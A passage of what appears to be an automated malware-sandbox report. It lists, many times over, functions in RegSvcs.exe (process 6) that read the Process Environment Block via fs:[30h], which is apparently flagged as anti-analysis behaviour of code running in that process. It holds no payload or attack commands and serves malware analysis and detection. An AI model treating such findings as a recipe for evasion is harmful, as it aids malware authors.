            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F34120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F5927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F54A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F54A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F15210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F15210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F15210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F15210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F33A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F28A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F21B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F21B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F43B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F43B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F435A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F37D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F53D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F276E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F416E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F58EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F436CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F946A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F48E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1608 mov eax, dword ptr fs:[00000030h]
